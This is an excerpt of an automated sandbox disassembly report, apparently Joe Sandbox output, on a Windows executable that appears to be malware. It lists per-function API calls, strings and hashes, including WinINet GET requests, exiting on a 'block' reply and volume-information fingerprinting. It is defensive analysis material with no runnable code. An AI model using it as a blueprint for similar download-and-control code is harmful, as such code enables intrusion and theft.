lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
lstrlenA.KERNEL32(0042D01C), ref: 0041F357
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
lstrlenA.KERNEL32(00915B40), ref: 0041F476
lstrcpy.KERNEL32(00000000,?), ref: 0041F506
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
lstrlenA.KERNEL32(0091F338), ref: 0041F8C2
lstrcpy.KERNEL32(00000000,0091F338), ref: 0041F8EF
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
lstrcpy.KERNEL32(00000000,?), ref: 0041F966
lstrcpy.KERNEL32(00000000,0091F338), ref: 0041FA28
lstrcpy.KERNEL32(00000000,0091F488), ref: 0041FA58
lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
lstrlenA.KERNEL32(0091F4A8), ref: 0041FC03
lstrcpy.KERNEL32(00000000,0091F4A8), ref: 0041FC30
lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7

Strings

ERROR, xrefs: 0041F788, 0041F88E, 0041FB30, 0041FBCF, 0041FE70, 0041FF0F

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: ERROR
API String ID: 367037083-2861137601
Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99

Function 004056C0 Relevance: 98.7, APIs: 51, Strings: 5, Instructions: 734
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 004056EF
lstrlenA.KERNEL32(?), ref: 00405742
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828

Strings

~A, xrefs: 0040576C, 00405FEA, 00405E90
------, xrefs: 00405B0B, 00405BFC, 00405CEA
", xrefs: 00405BA4, 00405C92, 00405D80
--, xrefs: 0040598F, 004059B7
------, xrefs: 00405929, 00405956

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: ------$"$--$------$~A
API String ID: 367037083-2106860866
Opcode ID: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
Opcode Fuzzy Hash: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8

Function 00418D00 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 174
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
ExitProcess.KERNEL32 ref: 00418D27
strtok_s.MSVCRT ref: 00418D39

Strings

block, xrefs: 00418D0B

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69

Function 00406B80 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
StrCmpCA.SHLWAPI(?,00926628), ref: 00406C2D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
HttpOpenRequestA.WININET(00000000,GET,?,00926068,00000000,00000000,-00400100,00000000), ref: 00406C90
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
InternetCloseHandle.WININET(00000000), ref: 00406DCE
InternetCloseHandle.WININET(?), ref: 00406DD8
InternetCloseHandle.WININET(00000000), ref: 00406DE2
lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03

Strings

ERROR, xrefs: 00406CF2
GET, xrefs: 00406C8A

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR$GET
API String ID: 3687753495-3591763792
Opcode ID: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
Opcode Fuzzy Hash: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8

Function 004226E0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,0091F388), ref: 0042271B
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,0091F388), ref: 0042274C
GetProcessHeap.KERNEL32(00000000,00000104,?,0091F388), ref: 004227AF
HeapAlloc.KERNEL32(00000000,?,0091F388), ref: 004227B6
wsprintfA.USER32 ref: 004227DB

Strings

:\, xrefs: 00422735
C, xrefs: 00422725

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C
API String ID: 1325379522-3309953409
Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5

Function 00405570 Relevance: 12.1, APIs: 8, Instructions: 112
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
RtlAllocateHeap.NTDLL(00000000), ref: 00405590
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
memcpy.MSVCRT(00000000,?,00000001), ref: 00405611
InternetCloseHandle.WININET(?), ref: 0040562B
InternetCloseHandle.WININET(00000000), ref: 00405632

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98

Function 00421BD0 Relevance: 12.1, APIs: 8, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98

Function 021A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 021A024D

Strings

cess, xrefs: 021A018D
kernel32.dll, xrefs: 021A008F, 021A0095

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: a92dde53e7f0460b6915921ba2abd90b4c6bb128c1e4e6853060bd0b69c2fd90
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: C3525A78A01229DFDB64CF98C994BACBBB1BF09304F1580D9E54DAB351DB30AA95CF14

Function 00408880 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004088B3

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

x@, xrefs: 004088EC, 004088EF
x@, xrefs: 00408954
yxxx, xrefs: 0040890A
vector<T> too long, xrefs: 004088AE
yxxx, xrefs: 004088BD

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx$x@$x@
API String ID: 2884196479-4254290729
Opcode ID: 3631ae9e788e00d3e12e11ee77256bbb8af0fde26882b1bfd41aa4cceea89c84
Instruction ID: 642d6f8d25606cb57c5c368211f8c71801378994f2d8b98954bdbb6ac3618ebc
Opcode Fuzzy Hash: 3631ae9e788e00d3e12e11ee77256bbb8af0fde26882b1bfd41aa4cceea89c84
Instruction Fuzzy Hash: 3F31B7B5E005159BCB08DF58C9906AEBBB6EB88310F14827EE905EB385DB34A901CBD5

Function 00404AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800,0091F3D8), ref: 00404B17
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
InternetCrackUrlA.WININET(?,00000000), ref: 00404B47

Strings

<, xrefs: 00404B07

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
